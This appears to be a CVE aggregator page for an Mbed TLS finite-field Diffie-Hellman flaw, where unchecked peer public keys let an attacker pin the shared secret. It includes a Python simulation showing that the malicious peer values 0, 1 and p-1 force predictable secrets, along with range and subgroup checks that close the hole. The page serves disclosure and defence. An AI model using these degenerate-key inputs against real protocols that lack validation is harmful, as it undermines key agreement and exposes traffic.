Security Vulnerability Report
CVE-2026-34872 CVSS 9.1 CRITICAL

CVE-2026-34872

Published: 2026-04-01 20:16:27
Last Modified: 2026-04-03 20:02:34

Description

An issue was discovered in Mbed TLS 3.5.x and 3.6.x through 3.6.5 and TF-PSA-Crypto 1.0. There is a lack of contributory behavior in FFDH due to improper input validation. Using finite-field Diffie-Hellman, the other party can force the shared secret into a small set of values (lack of contributory behavior). This is a problem for protocols that depend on contributory behavior (which is not the case for TLS). The attack can be carried out by the peer, or depending on the protocol by an active network attacker (person in the middle).

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:arm:mbed_tls:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:arm:tf-psa-crypto:1.0.0:-:*:*:*:*:*:* - VULNERABLE
Mbed TLS 3.5.x
Mbed TLS 3.6.0 through 3.6.5
TF-PSA-Crypto 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC Concept: Demonstrating the lack of contributory behavior
# by forcing a weak shared secret via a malicious peer public key.
# In a vulnerable FFDH implementation, sending a small integer
# as the public key might not be properly validated.
# Note: this is a pure-Python simulation of the arithmetic; it does
# not call into Mbed TLS.


def simulate_vulnerable_dh(prime, vulnerable_peer_public_key):
    """
    Simulates the shared secret calculation on the victim's side.
    Assumes the victim accepts the 'vulnerable_peer_public_key'
    without validation.
    """
    # Victim's private key (fixed here for reproducibility; a real
    # peer draws it at random, which makes no difference to the attack)
    victim_private_key = 12345
    # Calculate shared secret: (peer_public_key ^ victim_private_key) % prime
    # If peer_public_key is 1, shared_secret is always 1.
    shared_secret = pow(vulnerable_peer_public_key, victim_private_key, prime)
    return shared_secret


# Example parameters: the 1536-bit MODP prime (RFC 3526 group 5)
p = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA237327FFFFFFFFFFFFFFFF

# Attack: The attacker sends '1' as the public key
malicious_public_key = 1

# Victim calculates shared secret
secret = simulate_vulnerable_dh(p, malicious_public_key)

print(f"[+] Malicious Public Key sent: {malicious_public_key}")
print(f"[+] Calculated Shared Secret: {secret}")

if secret == 1:
    print("[+] Vulnerability Confirmed: Shared secret forced to a predictable value (1).")
else:
    print("[-] Validation may be in place.")
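The PoC above shows only the peer value 1. The example below, added here and not part of the original page or of Mbed TLS, shows the full "small set of values" the description refers to (the degenerate peer values 0, 1 and p-1 pin the secret to {0, 1, p-1} no matter which private key the victim draws) and the peer-key checks that close it: the range check 1 < Y < p-1 and, for a safe-prime group, the subgroup check Y^q mod p == 1 (both from RFC 7919 section 5.1 / NIST SP 800-56A). It reuses the 1536-bit MODP prime from RFC 3526 group 5 that the PoC uses; the function names are hypothetical and are not the Mbed TLS or PSA API.

```python
import secrets

# 1536-bit MODP prime, RFC 3526 group 5 (the prime the PoC above uses).
# It is a safe prime: Q = (P - 1) / 2 is prime, and because P = 7 (mod 8)
# the generator 2 is a quadratic residue, so G generates the order-Q subgroup.
P = int(
    "FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74"
    "020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F1437"
    "4FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED"
    "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF05"
    "98DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB"
    "9ED529077096966D670C354E4ABC9804F1746C08CA237327FFFFFFFFFFFFFFFF",
    16,
)
G = 2
Q = (P - 1) // 2


def shared_secret_unchecked(peer_pub: int, priv: int) -> int:
    """The vulnerable pattern: exponentiate whatever the peer sent."""
    return pow(peer_pub, priv, P)


def validate_peer_public_key(peer_pub: int, full: bool = True) -> bool:
    """Peer-key checks (hypothetical helper, not an Mbed TLS function).

    Range check 1 < Y < P-1 rejects 0, 1 and P-1, the values that force the
    secret into {0, 1, P-1}.  The full check Y^Q == 1 (mod P) additionally
    requires Y to lie in the order-Q subgroup, so a peer cannot send -Y
    (order 2Q), which passes the range check but leaks the parity of priv
    through the sign of the resulting secret.
    """
    if not 1 < peer_pub < P - 1:
        return False
    if full and pow(peer_pub, Q, P) != 1:
        return False
    return True


def shared_secret_checked(peer_pub: int, priv: int) -> int:
    """Hardened form: refuse the exchange instead of deriving a pinned secret."""
    if not validate_peer_public_key(peer_pub):
        raise ValueError("invalid FFDH peer public key")
    return pow(peer_pub, priv, P)


def honest_public_key(priv: int) -> int:
    """What a well-behaved peer sends: G^priv mod P."""
    return pow(G, priv, P)


def forced_secrets(trials: int = 8) -> set:
    """Feed the three degenerate peer values to the unchecked computation with
    fresh random private keys and collect every secret that comes out.  The
    result never leaves {0, 1, P-1}: the victim's key contributes nothing."""
    observed = set()
    for _ in range(trials):
        priv = secrets.randbelow(Q - 2) + 2  # fresh victim key each round
        for bad in (0, 1, P - 1):
            observed.add(shared_secret_unchecked(bad, priv))
    return observed


if __name__ == "__main__":
    seen = forced_secrets()
    print("secrets observed from degenerate peer keys:",
          sorted("0" if s == 0 else "1" if s == 1 else "P-1" for s in seen))
    y = honest_public_key(123456789)
    print("honest key accepted:", validate_peer_public_key(y))
    print("-Y passes range check only:",
          validate_peer_public_key(P - y, full=False),
          validate_peer_public_key(P - y, full=True))
    for bad in (0, 1, P - 1):
        try:
            shared_secret_checked(bad, 12345)
        except ValueError as e:
            print(f"peer value {'P-1' if bad == P - 1 else bad}: {e}")
```

The range check alone is what stops the attack described in this CVE; the subgroup check costs one extra exponentiation and is the full validation the standards recommend when the group is a safe prime. Protocols that feed the shared secret straight into a key schedule without other contributory input (unlike TLS, which mixes both parties' nonces and the transcript) are the ones where a pinned secret matters.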

References

https://mbed-tls.readthedocs.io/en/latest/security-advisories/ (Vendor Advisory)
https://mbed-tls.readthedocs.io/en/latest/security-advisories/mbedtls-security-advisory-2026-03-ffdh-peerkey-checks/ (Mitigation, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34872", "sourceIdentifier": "[email protected]", "published": "2026-04-01T20:16:27.493", "lastModified": "2026-04-03T20:02:33.790", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Mbed TLS 3.5.x and 3.6.x through 3.6.5 and TF-PSA-Crypto 1.0. There is a lack of contributory behavior in FFDH due to improper input validation. Using finite-field Diffie-Hellman, the other party can force the shared secret into a small set of values (lack of contributory behavior). This is a problem for protocols that depend on contributory behavior (which is not the case for TLS). The attack can be carried by the peer, or depending on the protocol by an active network attacker (person in the middle)."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-347"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:arm:mbed_tls:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.6.6", "matchCriteriaId": "C8FBFC2E-329D-4274-A952-2D43378B83BD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:arm:tf-psa-crypto:1.0.0:-:*:*:*:*:*:*", "matchCriteriaId": "874FFF30-23C9-453A-8E82-037AD3F12345"}]}]}], "references": [{"url": "https://mbed-tls.readthedocs.io/en/latest/security-advisories/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": 
"https://mbed-tls.readthedocs.io/en/latest/security-advisories/mbedtls-security-advisory-2026-03-ffdh-peerkey-checks/", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}